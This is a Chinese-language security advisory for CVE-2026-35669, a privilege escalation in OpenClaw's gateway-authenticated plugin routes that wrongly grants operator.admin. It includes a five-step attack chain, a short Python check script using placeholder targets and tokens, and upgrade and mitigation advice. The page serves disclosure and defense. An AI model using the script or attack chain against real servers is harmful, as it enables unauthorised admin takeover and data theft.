IPBUF安全漏洞报告
English
CVE-2026-35669 CVSS 8.8 高危

CVE-2026-35669 OpenClaw权限提升漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-35669
漏洞类型
权限提升
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

权限提升OpenClawCWE-269访问控制失效

漏洞概述

OpenClaw 2026.3.25 之前的版本在网关认证插件 HTTP 路由中存在严重的权限提升漏洞。由于系统在处理运行时作用域时出现逻辑错误,会不正确地授予调用者 `operator.admin` 权限,而完全无视调用者原本被授予的有限权限。攻击者利用该漏洞可以绕过权限边界检查,将低权限账户提升至管理员级别,进而执行未授权的敏感管理操作,对系统安全构成严重威胁。

技术细节

该漏洞的根源在于 OpenClaw 网关认证插件 HTTP 路由中的权限校验逻辑缺陷。在处理经过网关身份验证的请求时,系统未能正确验证调用者实际持有的权限范围。具体而言,当请求到达特定路由时,组件错误地生成了包含 `operator.admin` 的运行时令牌或上下文,而不是根据请求头或身份令牌中预设的权限范围进行限制。这种逻辑错误导致了权限边界的完全失效。攻击者无需拥有管理员权限,只需发起一个经过网关认证的请求,系统便会自动赋予其最高级别的操作权限。利用方式通常涉及向受影响的 HTTP 路由发送特制请求,由于系统盲目信任网关认证结果并赋予最高权限,攻击者即可借此接管系统或破坏数据完整性。

攻击链分析

STEP 1
侦察
攻击者识别出目标系统运行的是 OpenClaw 且版本低于 2026.3.25。
STEP 2
获取低权限凭证
攻击者注册一个普通用户账户或通过其他方式获取一个有效的低权限认证令牌。
STEP 3
利用漏洞
攻击者使用低权限令牌向受影响的网关认证插件 HTTP 路由发送特制请求。
STEP 4
权限提升
系统后端错误地授予请求 `operator.admin` 运行时范围,攻击者借此获得管理员权限。
STEP 5
执行操作
攻击者利用获得的管理员权限执行未授权的系统配置修改或数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: OpenClaw Privilege Escalation (CVE-2026-35669) # Description: PoC to demonstrate the incorrect minting of operator.admin scope # Note: Replace TARGET_URL and AUTH_TOKEN with valid values def check_poc(): target_url = "http://target-openclaw-server/api/gateway/authenticated/route" # Use a low-privilege token headers = { "Authorization": "Bearer <LOW_PRIVILEGE_TOKEN>", "Content-Type": "application/json" } try: # Send request to the vulnerable route response = requests.get(target_url, headers=headers, timeout=10) # Check if response indicates admin access or sensitive data exposure if response.status_code == 200 and "admin" in response.text.lower(): print("[+] Vulnerability confirmed! Admin access granted with low privileges.") print("[+] Response snippet:", response.text[:200]) else: print("[-] Target may not be vulnerable or requires specific interaction.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": check_poc()

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施
建议立即将 OpenClaw 升级至 2026.3.25 或更高版本以修复此漏洞。如果无法立即升级,应严格限制对网关认证插件 HTTP 路由的网络访问权限,仅允许受信任的内部 IP 访问,并密切监控系统日志,检测是否存在低权限账户尝试执行管理员操作的行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表